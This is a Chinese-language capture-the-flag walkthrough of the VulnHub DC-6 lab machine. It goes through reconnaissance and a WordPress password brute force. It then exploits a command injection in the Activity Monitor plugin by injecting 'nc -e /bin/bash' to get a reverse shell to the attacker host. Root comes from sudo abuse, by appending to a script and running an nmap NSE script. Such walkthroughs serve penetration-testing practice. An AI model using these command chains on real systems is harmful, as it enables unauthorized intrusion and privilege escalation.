DC-6靶机

一.环境搭建

1.下载地址

靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip

2.虚拟机配置

设置网络为nat模式,启动打开时,发现错误直接重试和点是

打开靶机虚拟机,如下图所示即为正常

二.开始渗透

1.信息收集

查找与攻击机(kali)同一网段的靶机ip

arp-scan -l

可以看到靶机ip为192.168.111.134,攻击机(kali)ip 为192.168.111.128

用nmap查看开放端口以及开放服务

nmap -p- -sV 192.168.111.134

开放了一个http和ssh服务,用浏览器打开http服务,发现无法访问,和之前一样,去修改dns文件

linux:
vim /etc/hosts
windows:
C:\Windows\System32\drivers\etc

添加如下的内容

192.168.111.134 wordy

用浏览器打开,得到如下界面,以及提示是wordpress

用whatweb查看一下具体信息

whatweb -v http://192.168.111.134

得知信息为word press和apache搭建的网站,用wpscan来扫描一下用户

wpscan --url http://wordy/ --enumerate u

发现如下用户名

将其保存在usernames.txt中,方便后续爆破

看了大佬的wp,发现提示写在人家官网

DC: 6 ~ VulnHub

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

对用户进行账号密码爆破

wpscan --url http://wordy/ -U usernames.txt -P password.txt

显示有六个用户存粹是我多复制了一下,不用在意这个

2.登录后台

看到用户名mark/helpdesk01,进行账户登录

登录地址(wordpress的后台地址,信息搜集,目录扫描,都做到这里了,不再做演示)

http://wordy/wp-admin/

侧边栏里面有个activity monitor插件, 去漏洞库搜一下这个插件是否有漏洞

WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection - PHP webapps Exploit

下面有利用方法

3.漏洞利用

漏洞利用地址如下

http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools

命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup

拼接如下命令

baidu.com | nc -e /bin/bash 192.168.111.128 4444

在kali端开启监听

nc -lvvp 4444

4.获取shell

得到如下shell

用python启一个交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

进入到home目录下,发现提示

cd /home/mark/stuff

进行ssh登录,graham/GSo7isUM1D4

ssh graham@192.168.111.134

5.进行提权

利用suid,发现没有可以利用的地方

查看当前用户可执行操作

sudo -l

发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本

cat /home/jens/backups.sh

向这个脚本写入命令,让jens这个用户来执行

echo "/bin/bash" >> /home/jens/backups.sh

sudo -u jens /home/jens/backups.sh

已经切换到jens用户,查看这个用户可以执行的命令

看到一个nmap,需要nmap打开一个shell即可获得root权限

nmap中执行shell方法

echo "os.execute('/bin/bash')">/tmp/shell.nse

sudo nmap --script=/tmp/shell.nse

不知道为什么,我这个shell不会显示我自己打的命令,所以需要自己盲打

cd /root
cat theflag.txt

最终成功获得root权限

相关推荐
中云DDoS CC防护蔡蔡39 分钟前
微信小程序被攻击怎么选择高防产品
服务器·网络安全·微信小程序·小程序·ddos
EasyNVR4 小时前
NVR管理平台EasyNVR多个NVR同时管理:全方位安防监控视频融合云平台方案
安全·音视频·监控·视频监控
黑客Ash7 小时前
【D01】网络安全概论
网络·安全·web安全·php
阿龟在奔跑8 小时前
引用类型的局部变量线程安全问题分析——以多线程对方法局部变量List类型对象实例的add、remove操作为例
java·jvm·安全·list
.Ayang9 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang9 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
好想打kuo碎9 小时前
1、HCIP之RSTP协议与STP相关安全配置
网络·安全
网络安全-老纪9 小时前
iOS应用网络安全之HTTPS
web安全·ios·https
周全全9 小时前
Spring Boot + Vue 基于 RSA 的用户身份认证加密机制实现
java·vue.js·spring boot·安全·php